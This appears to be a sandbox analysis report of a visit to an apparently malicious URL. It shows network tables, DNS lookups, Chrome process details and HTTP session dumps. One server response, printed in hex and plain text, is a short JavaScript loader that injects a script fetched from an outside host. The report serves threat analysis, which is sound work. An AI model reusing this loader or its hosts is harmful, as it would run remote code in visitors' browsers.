        Dec 12, 2024 08:11:45.076425076 CET49673443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:54.604554892 CET49674443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:54.629836082 CET49675443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:54.682653904 CET49673443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:57.087222099 CET4434970323.1.237.91192.168.2.5
        Dec 12, 2024 08:11:57.087402105 CET49703443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:57.477822065 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:57.477868080 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:57.478060007 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:57.478214979 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:57.478250980 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.011256933 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.011334896 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:11:59.011409044 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.011782885 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.011871099 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:11:59.011940956 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.012015104 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.012057066 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:11:59.012284994 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:11:59.012339115 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:11:59.183501005 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.183904886 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:59.183970928 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.185651064 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.185730934 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:59.186809063 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:59.186911106 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.234150887 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:11:59.234213114 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:11:59.280927896 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:00.995722055 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.996100903 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:00.996166945 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.996397018 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.996561050 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:00.996624947 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.997534990 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.997607946 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:00.997663975 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:00.997741938 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.003789902 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.003942966 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.005068064 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.005240917 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.005276918 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.005279064 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.055619955 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.056170940 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.056235075 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.104254961 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.487587929 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.487673998 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.488121033 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.488255024 CET49715443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.488296986 CET44349715185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.531842947 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.575347900 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.997298002 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.997400045 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:01.997581959 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.998302937 CET49714443192.168.2.5185.121.15.137
        Dec 12, 2024 08:12:01.998368025 CET44349714185.121.15.137192.168.2.5
        Dec 12, 2024 08:12:08.876096964 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:08.876240015 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:08.876703024 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:09.059748888 CET49712443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:09.059772015 CET44349712142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:57.401021004 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:57.401106119 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:57.401226044 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:57.401534081 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:57.401566982 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:59.098967075 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:59.099556923 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:59.099582911 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:59.100673914 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:59.101114988 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:12:59.101298094 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:12:59.149501085 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:13:08.796384096 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:13:08.796488047 CET44349831142.250.181.132192.168.2.5
        Dec 12, 2024 08:13:08.796570063 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:13:09.057356119 CET49831443192.168.2.5142.250.181.132
        Dec 12, 2024 08:13:09.057427883 CET44349831142.250.181.132192.168.2.5
        TimestampSource PortDest PortSource IPDest IP
        Dec 12, 2024 08:11:53.310640097 CET53553061.1.1.1192.168.2.5
        Dec 12, 2024 08:11:53.324795008 CET53633601.1.1.1192.168.2.5
        Dec 12, 2024 08:11:56.050764084 CET53634781.1.1.1192.168.2.5
        Dec 12, 2024 08:11:57.339056969 CET4962053192.168.2.51.1.1.1
        Dec 12, 2024 08:11:57.339184046 CET5623553192.168.2.51.1.1.1
        Dec 12, 2024 08:11:57.476232052 CET53496201.1.1.1192.168.2.5
        Dec 12, 2024 08:11:57.476275921 CET53562351.1.1.1192.168.2.5
        Dec 12, 2024 08:11:58.239558935 CET6510553192.168.2.51.1.1.1
        Dec 12, 2024 08:11:58.241652966 CET5973453192.168.2.51.1.1.1
        Dec 12, 2024 08:11:58.919018984 CET53597341.1.1.1192.168.2.5
        Dec 12, 2024 08:11:59.010623932 CET53651051.1.1.1192.168.2.5
        Dec 12, 2024 08:12:13.085558891 CET53506451.1.1.1192.168.2.5
        Dec 12, 2024 08:12:32.281078100 CET53567841.1.1.1192.168.2.5
        Dec 12, 2024 08:12:52.777904034 CET53566641.1.1.1192.168.2.5
        Dec 12, 2024 08:12:54.287307024 CET53520231.1.1.1192.168.2.5
        TimestampSource IPDest IPChecksumCodeType
        Dec 12, 2024 08:11:53.419595003 CET192.168.2.51.1.1.1c234(Port unreachable)Destination Unreachable
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Dec 12, 2024 08:11:57.339056969 CET192.168.2.51.1.1.10xe4cStandard query (0)www.google.comA (IP address)IN (0x0001)false
        Dec 12, 2024 08:11:57.339184046 CET192.168.2.51.1.1.10x8103Standard query (0)www.google.com65IN (0x0001)false
        Dec 12, 2024 08:11:58.239558935 CET192.168.2.51.1.1.10x607bStandard query (0)objmapper.comA (IP address)IN (0x0001)false
        Dec 12, 2024 08:11:58.241652966 CET192.168.2.51.1.1.10x30f0Standard query (0)objmapper.com65IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Dec 12, 2024 08:11:57.476232052 CET1.1.1.1192.168.2.50xe4cNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
        Dec 12, 2024 08:11:57.476275921 CET1.1.1.1192.168.2.50x8103No error (0)www.google.com65IN (0x0001)false
        Dec 12, 2024 08:11:59.010623932 CET1.1.1.1192.168.2.50x607bNo error (0)objmapper.com185.121.15.137A (IP address)IN (0x0001)false
        • objmapper.com
        • https:
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549715185.121.15.1374436672C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-12-12 07:12:01 UTC700OUTGET /CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e HTTP/1.1
        Host: objmapper.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-12-12 07:12:01 UTC299INHTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 12 Dec 2024 07:12:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 227
        Connection: close
        Cache-Control: no-cache, no-store, must-revalidate
        Expires: Thu, 12 Dec 2024 07:12:01 GMT
        Vary: Accept-Encoding
        Access-Control-Allow-Origin: *
        2024-12-12 07:12:01 UTC227INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 75 2c 71 2c 79 2c 64 2c 6e 29 7b 64 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 71 29 3b 6e 3d 75 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 71 29 5b 30 5d 3b 64 2e 61 73 79 6e 63 3d 31 3b 64 2e 73 72 63 3d 79 3b 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 64 2c 6e 29 3b 7d 29 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 76 69 72 74 75 61 6c 2e 75 72 62 61 6e 2d 6f 72 74 68 6f 64 6f 6e 74 69 63 73 2e 63 6f 6d 2f 53 7a 6c 70 6e 54 41 62 43 76 51 76 47 31 4f 76 66 51 70 46 76 7a 6b 62 55 37 38 78 51 41 58 37 4f 31 73 66 76 7a 59 3d 27 29 3b
        Data Ascii: ;(function(u,q,y,d,n){d=u.createElement(q);n=u.getElementsByTagName(q)[0];d.async=1;d.src=y;n.parentNode.insertBefore(d,n);})(document,'script','https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=');


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.549714185.121.15.1374436672C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-12-12 07:12:01 UTC626OUTGET /favicon.ico HTTP/1.1
        Host: objmapper.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Referer: https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-12-12 07:12:01 UTC143INHTTP/1.1 404 Not Found
        Server: nginx
        Date: Thu, 12 Dec 2024 07:12:01 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        2024-12-12 07:12:01 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:02:11:48
        Start date:12/12/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:02:11:51
        Start date:12/12/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2032,i,3206080748019218094,3044205605287419375,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:3
        Start time:02:11:57
        Start date:12/12/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        No disassembly